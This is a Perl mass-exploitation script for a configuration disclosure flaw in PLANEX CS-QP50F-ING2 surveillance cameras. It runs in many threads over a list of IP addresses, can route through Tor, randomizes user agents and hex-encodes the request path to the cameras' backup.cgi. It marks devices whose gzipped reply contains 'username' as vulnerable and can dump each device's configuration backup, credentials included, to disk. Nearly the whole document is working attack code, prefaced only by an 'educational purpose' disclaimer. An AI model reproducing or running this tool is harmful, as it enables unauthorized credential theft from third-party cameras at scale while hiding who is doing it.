#!/usr/bin/perl
#
# PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter
#
# Copyright 2021 (c) Todor Donev <todor.donev at gmail.com>
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
#
use strict;
use warnings;
use Getopt::Long;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Data::Validate::IP;
use MCE::Hobo 1.817;
use MCE::Shared;
use Gzip::Faster 'gunzip';
my $queue1 = MCE::Shared->queue(fast => 1);
my $queue2 = MCE::Shared->queue(fast => 1);
my $redirects = 3;
my $timeout = 60;
my $targets = undef;
my $threads = 10;
my $tor = undef;
my $dump = undef;
my $gzip_magic = "\x1F\x8B\x08";
printf("\n PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter\n");
sub help() {
printf("\n $0 --targets=<FILENAME> [ --threads=10 --redirects=7 ] --help\n\n");
printf(" Required args:\n\n");
printf(" %-12s | %s\n\n", "--targets", "Specify the list with addresses that you want to scan.");
printf(" Not required args:\n\n");
printf(" %-12s | %s\n", "--dump", "Dump backup configuration file for each target");
printf(" %-12s | %s\n", "--tor", "Use Tor anonymity network");
printf(" %-12s | %s\n", "--timeout", "Specify HTTP request timeout. Default: 60");
printf(" %-12s | %s\n", "--threads", "Specify threads. Default: 10 / Maximum threads: 200");
printf(" %-12s | %s\n\n", "--redirects", "Specify HTTP response redirects. Default: 3");
printf(" e.g. perl $0 --targets=portscan.log --threads=25\n");
printf(" e.g. perl $0 --targets=portscan.log --threads=25 --tor\n");
printf(" e.g. perl $0 --targets=portscan.log --threads=25 --tor --dump\n\n\n");
printf(" Author: Todor Donev <todor.donev\@gmail.com> https://donev.eu/\n\n\n");
exit;
}
GetOptions(
"targets=s" => \$targets,
"timeout=i" => \$timeout,
"redirects=i" => \$redirects,
"threads=i" => \$threads,
"tor" => \$tor,
"dump" => \$dump,
"help|h!" => \&help
);
help() if (!$targets);
printf(" Error: TARGETLIST not exist, not readable, not plain or is empty!\n") and exit if (! -e $targets || -z $targets || ! -r $targets || ! -f $targets);
printf(" Error: Timeout is too short. Minimum timeout: 10\n") and exit if ($timeout < 10);
printf(" Error: Threads are too many. Maximum threads: 200\n") and exit if ($threads > 200);
my @tmp_targets = ();
my @targets = `cat $targets | grep -v '^[[:space:]]*[#;]' | uniq`;
for my $line (@targets) {
chomp($line);
next if ($line =~ /^(\s*(#.*)?)?$/);
next if (not is_ipv4($line));
push @tmp_targets, $line;
}
@tmp_targets = sort { $a cmp $b } @tmp_targets;
@targets = ();
@targets = @tmp_targets;
@tmp_targets = ();
printf(" Error: There are not valid targets specified for scanning.\n") and exit if (scalar @targets == 0);
printf("-------------------------------------------------------------------------------------------------------------\n");
printf(" Target Code Status \n");
printf("-------------------------------------------------------------------------------------------------------------\n");
MCE::Hobo->create("work") for 1..$threads;
$queue1->enqueue(@targets);
$queue1->end;
while (my $result = $queue2->dequeue) {
if (exists $result->{finished}) {
MCE::Hobo->waitone;
$queue2->end unless MCE::Hobo->pending;
next;
}
my ($target, $code, $status) = ($result->{target}, $result->{code}, $result->{status});
printf(" %-30.30s %-40.40s %-50.50s\n", $target, $code, $status);
}
exit;
sub work {
while (my $addr = $queue1->dequeue()) {
chomp($addr);
my ($target, $code, $status) = scan($addr, $redirects, $timeout);
$queue2->enqueue({ target => $target, code => $code, status => $status});
}
$queue2->enqueue({ finished => $$ });
return;
}
sub scan {
my ($addr, $redirects, $timeout) = @_;
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout($timeout);
$browser->agent($user_agent);
$browser->max_redirect($redirects);
if (defined($tor)) {
$browser->proxy([qw(http https)] => 'socks://127.0.0.1:9050');
}
my $target = "http://".$addr."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $header = ["Content-Type" => "application/x-www-form-urlencoded; charset=UTF-8"];
my $request = HTTP::Request->new (GET => $target, $header, "");
my $response = eval{ $browser->request($request) };
my $status = ($response->content =~ m/($gzip_magic)/ && gunzip($response->content) =~ m/username/) ? "VULNERABLE" : "NOT VULNERABLE";
if (defined($dump)) {
if ($response->is_success && $status eq "VULNERABLE") {
my @config = $response->content;
my $config_file = $addr."_config_backup.bin";
open (FH, "> $config_file") or die " Error: $config_file $!";
flock (FH, 2);
truncate (FH, 0);
seek (FH, 0, 0);
print (FH $_) foreach (@config);
close (FH);
@config = ();
}
}
my $code = $response->status_line() ? $response->status_line() : "ERROR";
return ($addr, $code, $status);
}
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